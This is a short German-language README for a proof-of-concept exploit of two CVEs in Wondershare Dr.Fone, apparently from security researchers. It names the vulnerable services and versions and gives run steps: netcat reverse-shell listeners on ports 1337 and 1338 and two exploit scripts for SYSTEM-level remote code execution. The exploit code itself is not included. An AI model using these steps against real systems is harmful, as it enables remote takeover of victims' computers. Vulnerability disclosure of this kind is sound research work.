
Proof-of-Concept-Exploit für CVE-2021-44595 und CVE-2021-44596 in Wondershare Dr.Fone, der Remote Code Execution mit SYSTEM-Rechten über verwundbare Dienste ermöglicht.
Netanel Cohen und Tomer Peled, Sicherheitsforscher bei BugSec.
POC-Beispiel zur Ausnutzung von Wondershare Dr.Fone.
Dr.Fone ist ein Telefon-Toolkit, das von Wondershare entwickelt wurde und anfällig für RCE ist.
Allein mit Netzwerkzugriff gelingt es uns, Remote-Code als SYSTEM-Benutzer auszuführen.
Anfällige Dienste:
InstallAssistService.exe
ElevationService.exe
Getestet auf Versionen: 12.0.7, 11.4
IP und Port ändern und ausführen.
stty raw -echo; (stty size; cat) | nc -lvnp 1338
./ElevationServiceRCE.py
nc -lvnp 1337
./InstallAssistServiceRCE.py